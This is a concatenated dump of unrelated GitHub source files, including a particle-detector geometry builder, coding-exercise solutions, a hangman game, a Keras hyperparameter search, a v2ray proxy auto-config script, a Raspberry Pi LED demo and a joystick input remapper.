YokeEndcap_min_z )\n rot = geom.structure.Rotation(name + \"_rot\", x=pi/2.0, y=phirot+pi, z=Q(\"0deg\"))\n pla = geom.structure.Placement(name + \"_pla\", volume=stave_lv, pos=pos, rot=rot)\n\n yoke_barrel_vol.placements.append(pla.name)\n\n self.add_volume(yoke_barrel_vol)\n\n if self.buildYokeEndcap:\n '''Endcaps'''\n #Mother volume Endcap\n yoke_endcap_shape_min = geom.shapes.PolyhedraRegular(\"YokeEndcap_min\", numsides=self.nsides_yoke, rmin=Q(\"0cm\"), rmax=rmax_endcap, dz=YokeEndcap_min_z)\n yoke_endcap_shape_max = geom.shapes.PolyhedraRegular(\"YokeEndcap_max\", numsides=self.nsides_yoke, rmin=Q(\"0cm\"), rmax=rmax_endcap, dz=YokeEndcap_max_z)\n\n eyoke_name = \"YokeEndcap\"\n yoke_endcap_shape = geom.shapes.Boolean( eyoke_name, type='subtraction', first=yoke_endcap_shape_max, second=yoke_endcap_shape_min )\n # yoke_endcap_vol = geom.structure.Volume( \"vol\"+eyoke_name, shape=yoke_endcap_shape, material=self.PRYMaterial)\n yoke_endcap_vol = geom.structure.Volume( \"vol\"+eyoke_name, shape=yoke_endcap_shape, material=\"Air\")\n\n for side in [\"L\", \"R\"]:\n #Create the volume for the endcaps\n yoke_thickness = YokeEndcap_max_z - YokeEndcap_min_z\n eyoke_name = eyoke_name + side\n eyoke_volname = \"vol\"+ eyoke_name\n yoke_endcap_shape_one = geom.shapes.PolyhedraRegular(eyoke_name, numsides=self.nsides_yoke, rmin=Q(\"0cm\"), rmax=rmax_endcap, dz=yoke_thickness/2.)\n yoke_endcap_lv = geom.structure.Volume( eyoke_volname, shape=yoke_endcap_shape_one, material=self.PRYMaterial)\n z_pos = YokeEndcap_max_z - yoke_thickness/2.\n if side == 'R':\n z_pos = -z_pos\n pos = geom.structure.Position(eyoke_name + side + \"_pos\", z=z_pos)\n rot = geom.structure.Rotation(eyoke_name + side + \"_rot\", z=Q(\"0deg\"))\n pla = geom.structure.Placement(eyoke_name + side + \"_pla\", volume=yoke_endcap_lv, pos=pos, rot=rot)\n yoke_endcap_vol.placements.append(pla.name)\n\n self.add_volume(yoke_endcap_vol)\n","repo_name":"gyang9/dunendggd","sub_path":"duneggd/Active/NDHPgTPC_SPYv3.py","file_name":"NDHPgTPC_SPYv3.py","file_ext":"py","file_size_in_byte":37605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10613761701","text":"import unittest\n\n\ndef group_anagrams(word_list):\n anagrams = {}\n for w in word_list:\n sorted_word = \"\".join(sorted(w))\n if sorted_word in anagrams:\n anagrams[sorted_word].append(w)\n else:\n anagrams[sorted_word] = [w]\n\n res = []\n for sorted_word in anagrams:\n for word in anagrams[sorted_word]:\n res.append(word)\n\n return res\n\n\nclass GroupAnagramsTest(unittest.TestCase):\n def test_group_anagrams(self):\n wordList = [\"cheese\", \"ham\", \"hceese\", \"mha\", \"spam\"]\n expected = [\"cheese\", \"hceese\", \"ham\", \"mha\", \"spam\"]\n self.assertEqual(expected, group_anagrams(wordList))\n\n wordList2 = [\"hello\", \"world\", \"olleh\"]\n expected2 = [\"hello\", \"olleh\", \"world\"]\n self.assertEqual(expected2, group_anagrams(wordList2))\n","repo_name":"jcockbain/ctci-solutions","sub_path":"chapter-10/Q02_group_anagrams.py","file_name":"Q02_group_anagrams.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"5612053774","text":"import json\n\nSTEVILO_DOVOLJENIH_NAPAK = 10\n\nPRAVILNA_CRKA = '+'\nPONOVLJENA_CRKA = 'o'\nNAPACNA_CRKA = '-'\n\nZMAGA = 'W'\nPORAZ = 'X'\n\nZACETEK = 'Z'\n\n\nclass Vislice:\n datoteka_s_stanjem = 'stanje.json'\n\n def __init__(self):\n self.igre = {}\n \n def prost_id_igre(self):\n if self.igre:\n return max(self.igre) + 1 #self.igre gre direkt čez ključe\n else:\n return 0\n \n def nova_igra(self):\n igra = nova_igra()\n id = self.prost_id_igre()\n self.igre[id] = (igra, ZACETEK)\n return id\n\n def ugibaj(self, id_igre, crka):\n igra, stanje = self.igre[id_igre]\n stanje = igra.ugibaj(crka)\n self.igre[id_igre] = (igra, stanje)\n \n\n def nalozi_igre_iz_datoteke(self):\n with open(self.datoteka_s_stanjem, encoding='utf8') as f:\n igre = json.load(f)\n for id_igre in igre:\n geslo = igre[id_igre]['geslo']\n crke = igre[id_igre]['crke']\n stanje = igre[id_igre]['stanje']\n\n igra = Igra(geslo)\n igra.crke = crke\n\n self.igre[int(id_igre)] = (igra, stanje)\n\n def zapisi_igre_v_datoteko(self):\n igre = {}\n for id_igre in self.igre:\n igra, stanje = self.igre[id_igre]\n igre[id_igre] = {'geslo': igra.geslo, 'crke': igra.crke, 'stanje': stanje}\n with open(self.datoteka_s_stanjem, 'w', encoding='utf8') as f:\n json.dump(igre, f)\n\n\nclass Igra:\n\n def __init__(self, geslo):\n self.geslo = geslo\n self.crke = []\n \n\n def napacne_crke(self):\n return [c for c in self.crke if c.upper() not in self.geslo.upper()]\n\n def pravilne_crke(self):\n return [c for c in self.crke if c.upper() in self.geslo.upper()]\n\n \n def stevilo_napak(self):\n return len(self.napacne_crke()) #če kličemo metodo mormo povedat na čem je uporabljena\n \n\n def poraz(self):\n return self.stevilo_napak() > STEVILO_DOVOLJENIH_NAPAK\n\n def zmaga(self):\n return not self.poraz() and len(self.pravilne_crke()) == len(set(self.geslo))\n #tle je še neki naredu..\n\n def pravilni_del_gesla(self):\n pravilno = ''\n for crka in self.geslo.upper():\n if crka in self.crke:\n pravilno += crka\n else:\n pravilno += '_'\n return pravilno\n \n # return ''.join([c if c in self.crke else '_' for c in self.geslo.upper()])\n\n def nepravilni_ugibi(self):\n return ' '.join(self.napacne_crke())\n \n \n def ugibaj(self, crka):\n crka = crka.upper()\n\n if crka in self.crke:\n return PONOVLJENA_CRKA\n elif crka in self.geslo.upper():\n self.crke.append(crka)\n if self.zmaga():\n return ZMAGA\n else:\n return PRAVILNA_CRKA\n else:\n self.crke.append(crka)\n if self.poraz():\n return PORAZ\n else:\n return NAPACNA_CRKA\n\n\n\nwith open(\"besede.txt\", encoding='utf-8') as f:\n bazen_besed = f.read().split()\n\n#read vrne niz tega vsega, split pa razdeli po vseh 'praznih prostorih', ki se nahajajo..\n\nimport random \n\ndef nova_igra():\n geslo = random.choice(bazen_besed)\n return Igra(geslo)\n\n","repo_name":"mancaprosek/Vislice","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71889850680","text":"with open('day13_input.txt') as f:\n data = f.read()\n\nbuses = data.split()[1]\nall_buses = buses.split(',')\n\n# (bus number, time offset)\nbuses = [(int(b), all_buses.index(b)) for b in all_buses if b != 'x']\n\nt = 0\nmod = 1\nfor (id, offset) in buses:\n while t % id != -offset % id:\n t += mod\n mod *= id\n\nprint(t)\n","repo_name":"Colprit/AdventOfCode2020","sub_path":"13/day13_b.py","file_name":"day13_b.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8696214026","text":"\"\"\"\n1. 컨테이너와 박스를 오름차순으로 정렬\n2. 가장 큰 컨테이너와 가장 큰 박스를 비교해 옮길 수 있는지 확인\n3. 최소시간 구하기\n a. 큰 수 부터 옮기기\n\"\"\"\n\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nc = sorted(list(map(int, input().split())), reverse=True)\nm = int(input())\nb = sorted(list(map(int, input().split())), reverse=True)\n\nif b[0] > c[0]:\n print(-1)\n sys.exit()\n\nans = 0\n\nwhile b:\n ans += 1\n for i in c:\n flag = False\n for j in b:\n if i >= j:\n b.remove(j)\n flag = True\n break\n if not flag:\n break\nprint(ans)\n","repo_name":"vinivin153/problem-solving","sub_path":"100joon/Gold/1092.py","file_name":"1092.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19263408433","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[24]:\n\n\nimport tensorflow as tf \n(X_train, y_train), (X_test, y_test) = tf.keras.datasets.boston_housing.load_data()\n\n\n# In[25]:\n\n\nX_train.shape[1:]\n\n\n# In[26]:\n\n\nimport keras\ndef build_model(n_hidden=1, n_neurons=25, optimizer=\"sgd\", learning_rate=0.00001, momentum=0): \n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.InputLayer(X_train.shape[1:]))\n for i in range(0, n_hidden):\n model.add(keras.layers.Dense(n_neurons, activation=\"relu\")) \n model.add(tf.keras.layers.Dense(1)) \n if optimizer == \"sgd\":\n model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate), loss=\"mse\", metrics=\"mae\") \n elif optimizer == \"nesterov\":\n model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate, nesterov=True), loss=\"mse\", metrics=\"mae\")\n elif optimizer == \"momentum\":\n model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=momentum), loss=\"mse\", metrics=\"mae\") \n else:\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), loss=\"mse\", metrics=\"mae\")\n return model\n\n\n# In[43]:\n\n\nimport os\nimport time\nimport numpy as np \n\nearly_stopping=tf.keras.callbacks.EarlyStopping(patience=10, min_delta=1.00)\n\nroot_logdir = os.path.join(os.curdir, \"tb_logs\")\ndef get_run_logdir(name): \n run_id = name\n return os.path.join(root_logdir, run_id)\n\n\n# In[44]:\n\n\nimport pickle \ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nlearning_rates = [0.000001, 0.00001, 0.0001]\nresults=[]\nfor lr in learning_rates:\n name=\"\"\n name += str(int(time.time()))\n name += \"_lr_\"\n name += str(lr)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(learning_rate=lr)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((lr, mse, mae)) \nwith open(\"lr.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[29]:\n\n\nprint(results) \n\n\n# In[45]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nfor hl in range(0,4):\n name=\"\"\n name += str(int(time.time()))\n name += \"_hl_\"\n name += str(hl)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(n_hidden=hl)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((hl, mse, mae)) \nwith open(\"hl.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[31]:\n\n\nprint(results) \n\n\n# In[46]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nneurons_number = [5, 25, 125]\nfor nn in neurons_number:\n name=\"\"\n name += str(int(time.time()))\n name += \"_nn_\"\n name += str(nn)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(n_neurons=nn)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((nn, mse, mae))\nwith open(\"nn.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[33]:\n\n\nprint(results) \n\n\n# In[47]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\noptimizers = [\"sgd\", \"nesterov\", \"momentum\", \"adam\"]\nfor opt in optimizers:\n name=\"\"\n name += str(int(time.time()))\n name += \"_opt_\"\n name += opt\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(optimizer=opt, momentum=0.5)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((opt, mse, mae))\nwith open(\"opt.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[35]:\n\n\nprint(results) \n\n\n# In[48]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nmomentums = [0.1, 0.5, 0.9]\nfor mom in momentums:\n name=\"\"\n name += str(int(time.time()))\n name += \"_mom_\"\n name += str(mom)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(optimizer=\"momentum\", momentum=mom)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((mom, mse, mae)) \nwith open(\"mom.pkl\", \"wb\") as file:\n pickle.dump(results, file) \n\n\n# In[37]:\n\n\nprint(results) \n\n\n# In[38]:\n\n\nparam_distribs = {\n\"model__n_hidden\": [0, 1, 2, 3],\n\"model__n_neurons\": [5, 25, 125],\n\"model__learning_rate\": [0.000001, 0.00001, 0.0001],\n\"model__optimizer\": [\"sgd\", \"nesterov\", \"momentum\", \"adam\"],\n\"model__momentum\": [0.1, 0.5, 0.9]\n}\n\n\n# In[39]:\n\n\nimport scikeras\nfrom scikeras.wrappers import KerasRegressor\nes = tf.keras.callbacks.EarlyStopping(patience=10, min_delta=1.0, verbose=1)\nkeras_reg = KerasRegressor(build_model, callbacks=[es])\n\n\n# In[40]:\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\nrnd_search_cv = RandomizedSearchCV(keras_reg, param_distribs, n_iter=30, cv=3, verbose=2)\nrnd_search_cv.fit(X_train, y_train, epochs=100, validation_split=0.1)\nrnd_search_cv.best_params_\n\n\n# In[41]:\n\n\nwith open(\"rnd_search.pkl\", \"wb\") as file:\n pickle.dump(rnd_search_cv.best_params_, file)\n\n\n# In[42]:\n\n\nrnd_search_cv.best_params_\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ostrowskaanna/MachineLearningCourse","sub_path":"lab11/lab11.py","file_name":"lab11.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37902706259","text":"#!/usr/local/bin/python3\n# -*- coding:utf-8 -*-\nimport base64\nimport json\nimport os\nimport random\nimport subprocess\nimport logging\nimport time\nfrom urllib import request\n\n# 配置信息\nurl = \"\"\nconfig_path = \"/etc/v2ray/config.json\"\nscripts_log = \"/opt/scripts/scripts.log\"\nlogging.basicConfig(filename=scripts_log, format=\"%(asctime)s-%(name)s-%(levelname)s-%(message)s\", level=logging.INFO)\n\nnet_test_lists = {\n\t\"https://www.google.com/\",\n\t\"https://www.facebook.com/\",\n\t\"https://www.youtube.com/\",\n\t\"https://www.ted.com/\",\n}\n\n\n# 获取订阅信息\ndef get_subscription(url, code=True):\n\t\"\"\"\n\t当code为Ture返回str,否则返回bytes类型\n\t:param url:\n\t:param code:\n\t:return:\n\t\"\"\"\n\tuser_agent = \"Mozilla/5.0 (Windows NT 10.0; WOW64) \\\nAppleWebKit/537.36 (KHTML, like Gecko) \\\nChrome/76.0.3809.132 Safari/537.36\"\n\ttry:\n\t\treq = request.Request(url)\n\t\treq.add_header('User-Agent', user_agent)\n\t\tresult = request.urlopen(req).read()\n\texcept Exception:\n\t\treturn None\n\tif code:\n\t\tresult = result.decode(\"utf-8\")\n\treturn result\n\n\n# 解析订阅信息\ndef parse_subscription(Subscription):\n\tresult = base64.b64decode(Subscription + '=' * (4 - len(Subscription) % 4))\n\tresult = result.decode(\"utf-8\")\n\tvmesses = result.splitlines()\n\treturn vmesses\n\n\n# 解析vmess为json\ndef parse_vmess(vmess, code=True):\n\tvmess = vmess[8:]\n\tif vmess[-1] == \"=\" or not (len(vmess) % 4):\n\t\tconfig = base64.b64decode(vmess)\n\telse:\n\t\tconfig = base64.b64decode(vmess + '=' * (4 - len(vmess) % 4))\n\tif code:\n\t\tconfig = config.decode(\"utf-8\")\n\treturn config\n\n\n# json反序列化\ndef load_config(config):\n\treturn json.loads(config)\n\n\n# 写入配置文件\ndef write2config(config):\n\twith open(config_path, \"r+\") as fd:\n\t\tserver_config = json.loads(fd.read())\n\t\t# unused: type\n\t\t# used: host path add port id aid net\n\t\t# useless: ps tls\n\n\t\t# 设置vnext: add port id\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['address'] = config['add'] # address\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['port'] = int(config['port']) # port\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['users'][0]['id'] = config['id'] # id\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['users'][0]['alterID'] = int(config['aid']) # aid\n\n\t\t# 如果net不是ws没有进行下去的意义了\n\t\tif config['net'] != \"ws\":\n\t\t\texit(1)\n\t\t\n\t\t# 设置ws: host path\n\t\tserver_config['outbounds'][0]['streamSettings']['wsSettings']['headers']['Host'] = config['host'] # host\n\t\tserver_config['outbounds'][0]['streamSettings']['wsSettings']['path'] = config['path'] # path\n\n\t\t# 设置tls: host\n\t\tserver_config['outbounds'][0]['streamSettings']['tlsSettings']['serverName'] = config['host'] # serverName\n\n\t\t# 设置network:net\n\t\tserver_config['outbounds'][0]['streamSettings']['network'] = config['net'] # network\n\n\t\t# 清空文件内容,重新写入\n\t\tfd.seek(0)\n\t\tfd.truncate()\n\t\tfd.write(json.dumps(server_config, indent=4))\n\n\n# 测试是否可达\ndef is_reachable(ip, times=3, timeout=3, count=1):\n\tfor i in range(int(times)):\n\t\ttry:\n\t\t\tret = subprocess.Popen(\"ping -c {} -W {} {}\".format(count, timeout, ip), shell=True)\n\t\t\tret.wait(3) # 等待三秒\n\t\texcept Exception:\n\t\t\t# log(LOG_ERR, \"is_reachable\", e)\n\t\t\tlogging.error(\"{} is unreachable\".format(ip))\n\t\tif ret.returncode == 0:\n\t\t\tlogging.info(\"{} is reachable\".format(ip))\n\t\t\treturn True\n\t\telse:\n\t\t\ttime.sleep(1)\n\treturn False\n\n\n# 测试是否可访问Google\ndef is_accessable():\n\tglobal net_test_lists\n\tfor net in net_test_lists:\n\t\tcommand = 'curl --insecure --proxy socks5://127.0.0.1:1080 -s -I -m 5 -o /dev/null -w %{{http_code}} {}'.format(net)\n\t\tret = os.popen(command).read()\n\t\tlogging.info(\"access {} http_code is:{}\".format(net, ret))\n\t\tif ret == \"200\":\n\t\t\treturn True\n\treturn False\n\n\n# restart v2ray\ndef restart_v2ray(times=3):\n\tlogging.info(\"restart v2ray service\")\n\twith open(scripts_log, \"a+\") as fd:\n\t\tfor i in range(int(times)):\n\t\t\tret = subprocess.Popen(\"systemctl restart v2ray || systemctl start v2ray\", shell=True, stdout=fd, stderr=fd)\n\t\t\tret.wait(10) # 等待十秒\n\t\t\tif ret.returncode == 0:\n\t\t\t\tlogging.info(\"success restarted v2ray\")\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tlogging.error(\"failed to restart v2ray retries {}/{}\".format(i + 1, times))\n\t\t\t\ttime.sleep(2)\n\treturn False\n\n\n# 自动更新配置信息\ndef update_config():\n\t# 从订阅服务器获取\n\tsubscription = get_subscription(url, True)\n\n\t# 解析订阅服务器\n\tvmesses = parse_subscription(subscription)\n\n\t# 解析节点配置信息\n\tserveres = list()\n\tfor v in vmesses:\n\t\tconfig = parse_vmess(v)\n\t\tserveres.append(load_config(config))\n\n\t# 找一个可用的节点重新生成配置文件\n\tfor it in serveres:\n\t\tif is_reachable(it['add']): # 测试是否可达\n\t\t\tlogging.info(\"{} is reachable\".format(it['add']))\n\t\t\twrite2config(it) # 写入配置文件\n\t\t\trestart_v2ray(3) # 重新启动v2ray\n\t\t\ttime.sleep(10) # 等待v2ray.service重启起来\n\t\t\tif is_accessable(): # 测试是否可以访问google\n\t\t\t\treturn\n\t\t\tlogging.info(\"{} can't use for access google\".format(it['add']))\n\t\telse:\n\t\t\tlogging.info(\"try other server\")\n\t\t\ttime.sleep(1)\n\n\tlogging.info(\"no server can be used, exit\")\n\texit(1)\n\n\n# 初始化\ndef init():\n\t# 创建日志目录\n\tif not os.path.exists(os.path.dirname(scripts_log)):\n\t\tos.makedirs(os.path.dirname(scripts_log))\n\n\t# 创建文件\n\tif not os.path.isfile(scripts_log):\n\t\tos.system(\"touch {}\".format(scripts_log))\n\n\nif __name__ == \"__main__\":\n\tinit() # 初始化\n\n\twhile True:\n\t\tif is_accessable(): # 可以访问google\n\t\t\t# 三十分钟到六十分钟睡眠\n\t\t\tseconds = 60 * random.randint(30, 50) + random.randint(1, 600)\n\t\t\tlogging.info(\"can access google, ready to sleep {} seconds\".format(seconds))\n\t\t\ttime.sleep(seconds) # 等待n久后,重测与google的链接\n\t\telse:\n\t\t\tlogging.error(\"can't access google, try other server\")\n\t\t\tupdate_config() # 更新配置信息\n\t\t\tlogging.info(\"success update v2ray config\")\n\n","repo_name":"jianmo-z/MyTools","sub_path":"auto-update-v2ray-conf/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"17686662242","text":"class Solution:\n def longestCommonPrefix(self, strs):\n count_len = []\n for i in arr:\n count_len.append(len(i))\n min_len = min(count_len)\n min_str_index = count_len.index(min_len)\n min_str = strs[min_str_index]\n result= ''\n count_number=0\n \n for st in strs:\n max_index = []\n for i in range(min_len):\n if min_str[i]==st[i]:\n max_index.append(i)\n count_number+=1\n else:\n break\n if count_number== len(strs):\n return min_str[:min(max_index)-1]\n else:\n return \"\"\nif __name__ == '__main__':\n sol = Solution()\n \n arr = [\"flower\",\"flow\",\"flight\"]\n print(sol.longestCommonPrefix(arr))","repo_name":"Shadin710/Leetcode","sub_path":"string/longest_common_prefix.py","file_name":"longest_common_prefix.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73937977719","text":"import RPi.GPIO as GPIO\nimport time\n\ncolor = [0xff00, 0x00ff, 0x0ff0, 0xf00f]\nRpin = 12\nGpin = 13\n\ndef setup():\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(Rpin, GPIO.OUT)\n GPIO.setup(Gpin, GPIO.OUT)\n \n GPIO.output(Rpin,GPIO.LOW)\n GPIO.output(Gpin, GPIO.LOW)\n\n global p_R, p_G\n p_R = GPIO.PWM(Rpin, 2000)\n p_G = GPIO.PWM(Gpin, 2000)\n\n p_R.start(0)\n p_G.start(0)\n\ndef map(x, in_min, in_max, out_min, out_max):\n return (x - in_min)*(out_max - out_min)/(in_max - in_min) + out_min\n\ndef setColor(col):\n R_val = col >> 8\n G_val = col & 0x00ff\n\n R_val = map(R_val, 0, 255, 0, 100)\n G_val = map(G_val, 0, 255, 0, 100)\n\n p_R.ChangeDutyCycle(R_val)\n p_G.ChangeDutyCycle(G_val)\n \ndef bright(x):\n GPIO.output(Rpin, 1)\n GPIO.output(Gpin, 1)\n p_R.ChangeDutyCycle(100)\n p_G.ChangeDutyCycle(100)\n time.sleep(x)\n GPIO.output(Rpin, GPIO.LOW)\n GPIO.output(Gpin, GPIO.LOW)\n time.sleep(x)\n\ndef loop():\n while True:\n for col in color:\n setColor(col)\n time.sleep(0.5)\n\ndef destroy():\n p_R.stop()\n p_G.stop()\n GPIO.output(Rpin, GPIO.LOW)\n GPIO.cleanup()\n\nif __name__ == '__main__':\n setup()\n time.sleep(5)\n try:\n loop()\n except KeyboardInterrupt:\n destroy()\n","repo_name":"atiger808/raspberry","sub_path":"ZKDEMO/01_dule_color_led.py","file_name":"01_dule_color_led.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8464247257","text":"from evdev import InputDevice, UInput, categorize, ecodes as e\nimport time\nimport evdev\nfrom enum import Enum\nfrom evdev.eventio_async import asyncio\nfrom pynotifier import Notification\nimport os\n\n\nclass InputType(Enum):\n KEYBOARD = 0\n MOUSE = 1\n\nclass AliexpressJoystickMapper:\n def __init__(self, dev_path : str, DEFAULT_MODE : InputType = InputType.KEYBOARD, TIME_DELAY : float=0.2):\n self.mode = DEFAULT_MODE\n self.TIME_DELAY = TIME_DELAY\n\n self.dev = evdev.InputDevice(dev_path)\n self.ui = UInput.from_device(self.dev, name='Keyboard remmapped from joystick')\n\n self.dev.grab()\n \n def run(self):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(self.mouse_joystick_event())\n\n def toggle_mode(self):\n dir_path = os.path.abspath(os.path.dirname(__file__))\n if self.mode == InputType.KEYBOARD:\n self.mode = InputType.MOUSE\n icon_path = os.path.join(dir_path, 'icons/input-mouse.svg')\n else:\n self.mode = InputType.KEYBOARD\n icon_path = os.path.join(dir_path, 'icons/input-keyboard.svg')\n\n print(icon_path)\n # message(\"Some title\", \"Changed mode\")\n \n Notification(\n title='Joystick mode changed',\n description=f'Mode is: {self.mode.name}',\n icon_path=icon_path,\n duration=2, # Duration in seconds\n urgency='normal'\n ).send()\n\n\n\n\n async def mouse_joystick_event(self):\n prev_timestamp = 0\n\n async for ev in self.dev.async_read_loop():\n elapsed = ev.timestamp() - prev_timestamp\n\n # Keyboard mode\n if self.mode == InputType.KEYBOARD:\n if ev.type == evdev.ecodes.EV_REL and elapsed > self.TIME_DELAY:\n if ev.code == evdev.ecodes.REL_X:\n if ev.value > 0:\n self.ui.write(e.EV_KEY, e.KEY_RIGHT, 1) # KEY_A down\n self.ui.write(e.EV_KEY, e.KEY_RIGHT, 0) # KEY_A down\n elif ev.value < 0:\n self.ui.write(e.EV_KEY, e.KEY_LEFT, 1) # KEY_A down\n self.ui.write(e.EV_KEY, e.KEY_LEFT, 0) # KEY_A down\n\n elif ev.code == evdev.ecodes.REL_Y:\n if ev.value < 0:\n self.ui.write(e.EV_KEY, e.KEY_UP, 1) # KEY_A down\n self.ui.write(e.EV_KEY, e.KEY_UP, 0) # KEY_A down\n elif ev.value > 0:\n self.ui.write(e.EV_KEY, e.KEY_DOWN, 1) # KEY_A down\n self.ui.write(e.EV_KEY, e.KEY_DOWN, 0) # KEY_A down\n\n self.ui.syn()\n prev_timestamp = ev.timestamp()\n if ev.type == evdev.ecodes.EV_KEY and elapsed > self.TIME_DELAY:\n if ev.code == evdev.ecodes.BTN_LEFT:\n self.ui.write(e.EV_KEY, e.KEY_ENTER, 1)\n self.ui.write(e.EV_KEY, e.KEY_ENTER, 0)\n if ev.code == evdev.ecodes.BTN_SIDE:\n self.ui.write(e.EV_KEY, e.KEY_BACKSPACE, 1)\n self.ui.write(e.EV_KEY, e.KEY_BACKSPACE, 0)\n if ev.code == evdev.ecodes.KEY_VOLUMEDOWN: # Toggle mode\n self.toggle_mode()\n prev_timestamp = ev.timestamp()\n self.ui.syn()\n\n # Mouse self.mode\n elif self.mode == InputType.MOUSE and not (ev.type == evdev.ecodes.EV_KEY and ev.code == evdev.ecodes.KEY_VOLUMEDOWN):\n self.ui.write_event(ev)\n self.ui.syn()\n elif (ev.type == evdev.ecodes.EV_KEY and ev.code == evdev.ecodes.KEY_VOLUMEDOWN) and elapsed > self.TIME_DELAY:\n if ev.code == evdev.ecodes.KEY_VOLUMEDOWN: # Toggle mode\n self.toggle_mode()\n prev_timestamp = ev.timestamp()\n self.ui.syn()\n\n\nimport sys\n\ndef main():\n args = sys.argv[1:]\n print(args)\n dev_path = args[0]\n print(dev_path)\n\n ali_joy = AliexpressJoystickMapper(dev_path)\n ali_joy.run()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Risto97/vrpark_remap","sub_path":"vr_park_remap.py","file_name":"vr_park_remap.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35428775132","text":"import pandas as pd\nimport random\n\nARRSIZE = 10000000 #array size\n\nascending_sorted = [x for x in range(0, ARRSIZE)] #sorted array in ascending order\ndescending_sorted = [x for x in range(ARRSIZE, 0, -1)] #sorted array in descending order\ndf = pd.DataFrame({'Ascending': ascending_sorted, 'Descending': descending_sorted}) #initialise dataset with two columns of sorted arrays\n\nitersize = 10\ncount = 0\nwhile count < itersize: #generate columns with values in random order\n colname = 'rand' + str(count) #generate column name\n df[colname] = [random.randint(0, ARRSIZE) for x in range(0, ARRSIZE)] #add new column with new random array\n count += 1\n\ndf.to_csv(\"exampleClass1DatasetSize\" + str(ARRSIZE) +\".csv\")\n\nprint(df)","repo_name":"Jabezng2/SC2001-AlgoDesign-Analysis","sub_path":"Example Class 1/datasetgeneration.py","file_name":"datasetgeneration.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36919070009","text":"'''\nVAE that also takes a y features array and tries to steer some latent features to map to given features\nMost of the code is identical to vae.py\n'''\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.distributions import Normal\nfrom 